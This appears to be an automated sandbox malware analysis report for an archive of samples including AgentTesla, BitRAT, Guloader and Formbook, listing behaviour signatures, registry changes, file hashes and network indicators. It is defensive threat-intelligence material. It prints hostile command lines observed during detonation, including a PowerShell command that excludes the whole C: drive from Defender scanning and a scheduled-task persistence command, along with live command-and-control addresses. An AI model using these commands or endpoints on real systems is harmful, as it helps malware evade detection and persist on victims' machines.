Analysis Overview
SHA256
031527224e74b82bf16e639c666134674ecc8a6e648fed2f68255617bd6a3b18
Threat Level: Known bad
The file 1.zip was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Guloader,Cloudeye
Xloader
BitRAT
suricata: ET MALWARE FormBook CnC Checkin (GET)
Formbook
ServHelper
BitRAT Payload
Xloader Payload
Formbook Payload
AgentTesla Payload
Grants admin privileges
Possible privilege escalation attempt
Blocklisted process makes network request
Sets DLL path for service in the registry
Modifies RDP port number used by Windows
UPX packed file
Loads dropped DLL
Modifies file permissions
Reads user/profile data of web browsers
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: RenamesItself
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious behavior: MapViewOfSection
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Script User-Agent
Runs net.exe
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-07-30 15:26
Signatures
Analysis: behavioral7
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
11s
Max time network
46s
Command Line
Signatures
Reads user/profile data of web browsers
Processes
C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe
"C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe"
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
151s
Max time network
146s
Command Line
Signatures
BitRAT
BitRAT Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2016 set thread context of 2140 | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp |
Files
memory/2016-114-0x0000000000130000-0x0000000000131000-memory.dmp
memory/2016-116-0x0000000005130000-0x0000000005131000-memory.dmp
memory/2016-117-0x0000000004C30000-0x0000000004C31000-memory.dmp
memory/2016-118-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
memory/2016-119-0x0000000004C30000-0x000000000512E000-memory.dmp
memory/2016-120-0x0000000006C00000-0x0000000006E07000-memory.dmp
memory/2016-121-0x0000000006E90000-0x0000000006E91000-memory.dmp
memory/2016-126-0x0000000006E10000-0x0000000006E7A000-memory.dmp
memory/2016-127-0x00000000079D0000-0x00000000079D1000-memory.dmp
memory/1524-128-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs
| MD5 | 4c3b08d7af0401a66aa7934a5f533276 |
| SHA1 | b5638475f3422d083a825a88a753db5e05666923 |
| SHA256 | 59f8fbd0ff79380d28c47847b14b846dd52ff36b00a08690c4cf5292b8dc5dc4 |
| SHA512 | 5497a31e5d47d2baa3bc43b6677fd8f35b55ed79e25bb831f5ee7c48c32e9aed9323a9b8d96dfc7ebe6ca3d3964f2d85ebaa2203a25b4b142ef2334542d87a0f |
memory/788-130-0x0000000000000000-mapping.dmp
memory/2140-131-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2140-132-0x000000000068A488-mapping.dmp
memory/2140-135-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/788-137-0x0000000006CB0000-0x0000000006CB1000-memory.dmp
memory/788-136-0x0000000006AC0000-0x0000000006AC1000-memory.dmp
memory/788-138-0x00000000072F0000-0x00000000072F1000-memory.dmp
memory/788-139-0x00000000071C0000-0x00000000071C1000-memory.dmp
memory/788-140-0x0000000007260000-0x0000000007261000-memory.dmp
memory/788-141-0x0000000007B70000-0x0000000007B71000-memory.dmp
memory/788-142-0x0000000007C80000-0x0000000007C81000-memory.dmp
memory/788-143-0x0000000006CB2000-0x0000000006CB3000-memory.dmp
memory/788-144-0x0000000007980000-0x0000000007981000-memory.dmp
memory/788-145-0x0000000008260000-0x0000000008261000-memory.dmp
memory/788-154-0x0000000009010000-0x0000000009043000-memory.dmp
memory/788-161-0x0000000006E20000-0x0000000006E21000-memory.dmp
memory/788-166-0x0000000009400000-0x0000000009401000-memory.dmp
memory/788-167-0x0000000009580000-0x0000000009581000-memory.dmp
memory/788-171-0x000000007F110000-0x000000007F111000-memory.dmp
memory/788-172-0x0000000006CB3000-0x0000000006CB4000-memory.dmp
memory/788-362-0x00000000094E0000-0x00000000094E1000-memory.dmp
memory/788-368-0x00000000094C0000-0x00000000094C1000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:30
Platform
win10v20210410
Max time kernel
0s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
9s
Max time network
134s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe
"C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 172.67.145.153:443 | tcp |
Files
memory/468-61-0x00000000002E0000-0x00000000002F3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
150s
Max time network
170s
Command Line
Signatures
BitRAT
BitRAT Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 748 set thread context of 624 | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs"
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'
Network
| Country | Destination | Domain | Proto |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp | |
| N/A | 185.244.30.28:4898 | tcp |
Files
memory/748-60-0x0000000000980000-0x0000000000981000-memory.dmp
memory/748-62-0x0000000000930000-0x0000000000931000-memory.dmp
memory/748-63-0x0000000005C60000-0x0000000005E67000-memory.dmp
memory/748-68-0x0000000004840000-0x00000000048AA000-memory.dmp
memory/1720-69-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs
| MD5 | 4c3b08d7af0401a66aa7934a5f533276 |
| SHA1 | b5638475f3422d083a825a88a753db5e05666923 |
| SHA256 | 59f8fbd0ff79380d28c47847b14b846dd52ff36b00a08690c4cf5292b8dc5dc4 |
| SHA512 | 5497a31e5d47d2baa3bc43b6677fd8f35b55ed79e25bb831f5ee7c48c32e9aed9323a9b8d96dfc7ebe6ca3d3964f2d85ebaa2203a25b4b142ef2334542d87a0f |
memory/1720-71-0x0000000075451000-0x0000000075453000-memory.dmp
memory/1136-73-0x0000000000000000-mapping.dmp
memory/624-74-0x000000000068A488-mapping.dmp
memory/624-72-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/624-77-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/1136-78-0x0000000001ED0000-0x0000000001ED1000-memory.dmp
memory/1136-79-0x00000000048B0000-0x00000000048B1000-memory.dmp
memory/1136-80-0x0000000002650000-0x0000000002651000-memory.dmp
memory/1136-81-0x0000000004870000-0x0000000004871000-memory.dmp
memory/1136-82-0x0000000004872000-0x0000000004873000-memory.dmp
memory/1136-83-0x00000000052C0000-0x00000000052C1000-memory.dmp
memory/1136-86-0x00000000056A0000-0x00000000056A1000-memory.dmp
memory/1136-91-0x00000000056F0000-0x00000000056F1000-memory.dmp
memory/1136-92-0x00000000061F0000-0x00000000061F1000-memory.dmp
memory/1136-99-0x0000000006280000-0x0000000006281000-memory.dmp
memory/1136-100-0x000000007EF30000-0x000000007EF31000-memory.dmp
memory/1136-101-0x0000000005620000-0x0000000005621000-memory.dmp
memory/1136-115-0x0000000006300000-0x0000000006301000-memory.dmp
memory/1136-116-0x0000000006310000-0x0000000006311000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win7v20210410
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.xivstatus.com | udp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
Files
memory/1676-60-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp
memory/1676-61-0x0000000002520000-0x0000000002521000-memory.dmp
memory/1676-62-0x000000001AAE0000-0x000000001AAE1000-memory.dmp
memory/1676-63-0x00000000026F0000-0x00000000026F1000-memory.dmp
memory/1676-65-0x000000001AA64000-0x000000001AA66000-memory.dmp
memory/1676-64-0x000000001AA60000-0x000000001AA62000-memory.dmp
memory/1676-66-0x0000000002470000-0x0000000002471000-memory.dmp
memory/1676-67-0x000000001C2C0000-0x000000001C2C1000-memory.dmp
memory/1676-68-0x000000001AA6A000-0x000000001AA89000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win7v20210410
Max time kernel
108s
Max time network
15s
Command Line
Signatures
AgentTesla
AgentTesla Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\hZpzJs = "C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe" | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2004 set thread context of 1688 | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | C:\Users\Admin\AppData\Local\Temp\87597.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp741.tmp"
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
Network
Files
memory/2004-59-0x00000000008A0000-0x00000000008A1000-memory.dmp
memory/2004-61-0x0000000004840000-0x0000000004841000-memory.dmp
memory/2004-62-0x00000000002E0000-0x00000000002FB000-memory.dmp
memory/2004-63-0x0000000005740000-0x00000000057C0000-memory.dmp
memory/2004-64-0x0000000001EF0000-0x0000000001F2C000-memory.dmp
memory/960-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmp741.tmp
| MD5 | ecde5ed2471122d09c320f97a8711098 |
| SHA1 | 45a1489f61f2373b6dc3d9515348ae5440eade6e |
| SHA256 | bef5ea3be9a7648156b773e67a33d1eb4b0abe2f578731751c2f1a6abc33483e |
| SHA512 | a80eb4a5c6d0d79c29d00d8fd905ebec95e25171f847bbe75fea4b71cce7364e256b8a741dd7b8ba4c26ec3beada0e1218d188c41564ab66bb9a8463ebd616ec |
memory/1688-68-0x00000000004374AE-mapping.dmp
memory/1688-67-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1688-69-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1688-71-0x00000000046E0000-0x00000000046E1000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
74s
Max time network
70s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 340 set thread context of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
Network
Files
memory/340-60-0x0000000000C20000-0x0000000000C21000-memory.dmp
memory/340-62-0x0000000004550000-0x0000000004551000-memory.dmp
memory/340-63-0x00000000004F0000-0x000000000050B000-memory.dmp
memory/340-64-0x0000000008040000-0x00000000080D0000-memory.dmp
memory/340-65-0x00000000053E0000-0x000000000542B000-memory.dmp
memory/568-66-0x0000000000400000-0x0000000000448000-memory.dmp
memory/568-67-0x00000000004025AC-mapping.dmp
memory/568-70-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:30
Platform
win7v20210410
Max time kernel
1s
Max time network
6s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210408
Max time kernel
109s
Max time network
113s
Command Line
Signatures
AgentTesla
AgentTesla Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\hZpzJs = "C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe" | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4016 set thread context of 3892 | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | C:\Users\Admin\AppData\Local\Temp\87597.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp351A.tmp"
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
Network
Files
memory/4016-114-0x00000000005E0000-0x00000000005E1000-memory.dmp
memory/4016-116-0x0000000005000000-0x0000000005001000-memory.dmp
memory/4016-117-0x00000000055A0000-0x00000000055A1000-memory.dmp
memory/4016-118-0x0000000005140000-0x0000000005141000-memory.dmp
memory/4016-119-0x00000000050A0000-0x000000000559E000-memory.dmp
memory/4016-120-0x0000000004FE0000-0x0000000004FE1000-memory.dmp
memory/4016-121-0x00000000052E0000-0x00000000052E1000-memory.dmp
memory/4016-122-0x00000000054A0000-0x00000000054BB000-memory.dmp
memory/4016-123-0x0000000000F80000-0x0000000001000000-memory.dmp
memory/4016-124-0x0000000001000000-0x000000000103C000-memory.dmp
memory/3364-125-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmp351A.tmp
| MD5 | c81583db743272eeb3b83a7389b4236f |
| SHA1 | 9f49a359817ce77d9003672bfeefaeb74615da68 |
| SHA256 | 3e5d78fddbd13f76566ef8831e6735a7bb556738ee31c643147051c20e3ba74b |
| SHA512 | 45ecd06010796155cbb9d1855b8ed910afab57194f8dcebbe1a1e6e754f7c6daa19d52827487627cd12e360274b7a4cd4f4576925d545798b7558e71b5c462a3 |
memory/3892-127-0x0000000000400000-0x000000000043C000-memory.dmp
memory/3892-128-0x00000000004374AE-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\87597.exe.log
| MD5 | 90acfd72f14a512712b1a7380c0faf60 |
| SHA1 | 40ba4accb8faa75887e84fb8e38d598dc8cf0f12 |
| SHA256 | 20806822f0c130b340504132c1461b589261fbbc518e468f4f90733ab514cb86 |
| SHA512 | 29dbf85e14e60868574cb4dc9bda83d3c229fb956733d8d2557f2475ee0e690ac9c2e72f31e02284996da6906ba2dbfa382a29b04c15a2406571d8ee19ad16b9 |
memory/3892-134-0x0000000005190000-0x0000000005191000-memory.dmp
memory/3892-135-0x0000000005130000-0x0000000005131000-memory.dmp
memory/3892-136-0x0000000005D30000-0x0000000005D31000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
37s
Max time network
91s
Command Line
Signatures
Reads user/profile data of web browsers
Processes
C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe
"C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe"
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
